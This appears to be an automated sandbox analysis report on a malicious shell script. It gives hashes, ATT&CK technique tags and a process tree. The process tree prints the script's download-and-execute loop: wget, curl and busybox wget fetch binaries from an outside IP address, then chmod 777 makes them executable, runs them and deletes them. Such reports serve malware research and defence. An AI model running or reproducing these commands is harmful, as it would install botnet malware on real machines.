Analysis
-
max time kernel
58s -
max time network
59s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mips image:debian9-mipsbe-20240418-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
01-11-2024 04:36
Static task
static1
Behavioral task
behavioral1
Sample
96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb.sh
-
Size
10KB
-
MD5
3dd5c19ec5fe98baa364142d535458dd
-
SHA1
07c95352a7b1f0aa31bea494cd8e2e4f6dfab78f
-
SHA256
96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb
-
SHA512
81bcbab2896b757cdebbc6b90b866f6a591c375036fd0043391e2b28b69a7d3fdb2471e023cdf9a613e4e8c0ad008231e4089365151a7e6249a8825b5eb7a479
-
SSDEEP
192:sUA5CiAJnvavrYnXpapai2b66+SeKLDsvrYnXZ+i2b66SSe+dUA5CiKnv1:sUA5CiAJnv/apmHRSUA5CiKnv1
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb.sh/tmp/96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb.sh1⤵PID:712
-
/bin/rm/bin/rm bins.sh2⤵PID:716
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵PID:722
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:734
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵PID:741
-
-
/bin/chmodchmod 777 lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵
- File and Directory Permissions Modification
PID:743
-
-
/tmp/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu./lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵
- Executes dropped EXE
PID:744
-
-
/bin/rmrm lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵PID:745
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵PID:746
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:747
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵PID:748
-
-
/bin/chmodchmod 777 sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/sgAW8gTvfedveDVZi11XW1pkq2gx7igga6./sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵
- Executes dropped EXE
PID:750
-
-
/bin/rmrm sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵PID:751
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵PID:752
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵
- Reads runtime system information
- Writes file to tmp directory
PID:753
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵PID:758
-
-
/bin/chmodchmod 777 ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15./ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵
- Executes dropped EXE
PID:765
-
-
/bin/rmrm ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵PID:769
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵PID:770
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:778
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵PID:786
-
-
/bin/chmodchmod 777 jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵
- File and Directory Permissions Modification
PID:792
-
-
/tmp/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo./jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵
- Executes dropped EXE
PID:793
-
-
/bin/rmrm jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵PID:796
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵PID:798
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:808
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵PID:811
-
-
/bin/chmodchmod 777 iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX./iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵
- Executes dropped EXE
PID:813
-
-
/bin/rmrm iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵PID:814
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- System Network Configuration Discovery
PID:815
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:816
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- System Network Configuration Discovery
PID:817
-
-
/bin/chmodchmod 777 P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- File and Directory Permissions Modification
PID:818
-
-
/tmp/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88./P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:819
-
-
/bin/rmrm P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- System Network Configuration Discovery
PID:820
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵PID:821
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:825
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵PID:835
-
-
/bin/chmodchmod 777 zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵
- File and Directory Permissions Modification
PID:841
-
-
/tmp/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs./zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵
- Executes dropped EXE
PID:843
-
-
/bin/rmrm zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵PID:846
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵PID:847
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:854
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵PID:859
-
-
/bin/chmodchmod 777 pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6./pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵PID:862
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵PID:863
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵PID:865
-
-
/bin/chmodchmod 777 Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk./Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵PID:868
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵PID:869
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵PID:871
-
-
/bin/chmodchmod 777 rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR./rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵PID:874
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵PID:875
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵PID:877
-
-
/bin/chmodchmod 777 Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR8./Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵PID:880
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵PID:881
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵PID:886
-
-
/bin/chmodchmod 777 wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi./wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵PID:889
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵PID:890
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵PID:892
-
-
/bin/chmodchmod 777 ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY./ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵PID:895
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵PID:896
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵PID:898
-
-
/bin/chmodchmod 777 Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp90./Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵PID:901
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵PID:902
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵PID:904
-
-
/bin/chmodchmod 777 ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15./ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵PID:907
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵PID:908
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵PID:910
-
-
/bin/chmodchmod 777 jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo./jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵PID:913
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵PID:914
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵PID:916
-
-
/bin/chmodchmod 777 iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX./iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵PID:919
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵PID:920
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵PID:922
-
-
/bin/chmodchmod 777 zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs./zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵PID:925
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵PID:926
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵PID:928
-
-
/bin/chmodchmod 777 pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6./pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵PID:931
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵PID:932
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵PID:934
-
-
/bin/chmodchmod 777 Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk./Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵PID:937
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵PID:938
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵PID:940
-
-
/bin/chmodchmod 777 rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR./rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵PID:943
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- System Network Configuration Discovery
PID:944
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- System Network Configuration Discovery
PID:946
-
-
/bin/chmodchmod 777 P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88./P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:948
-
-
/bin/rmrm P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- System Network Configuration Discovery
PID:949
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵PID:950
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵PID:952
-
-
/bin/chmodchmod 777 wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi./wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵PID:955
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵PID:956
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵PID:958
-
-
/bin/chmodchmod 777 ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY./ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵PID:961
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵PID:962
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵
- Reads runtime system information
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵PID:964
-
-
/bin/chmodchmod 777 Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp90./Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵PID:967
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵PID:968
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵PID:970
-
-
/bin/chmodchmod 777 Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR8./Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵PID:973
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵PID:974
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:975
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵PID:976
-
-
/bin/chmodchmod 777 lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵
- File and Directory Permissions Modification
PID:977
-
-
/tmp/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu./lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵
- Executes dropped EXE
PID:978
-
-
/bin/rmrm lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵PID:979
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵PID:980
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:981
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵PID:982
-
-
/bin/chmodchmod 777 sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵
- File and Directory Permissions Modification
PID:983
-
-
/tmp/sgAW8gTvfedveDVZi11XW1pkq2gx7igga6./sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵
- Executes dropped EXE
PID:984
-
-
/bin/rmrm sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵PID:985
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97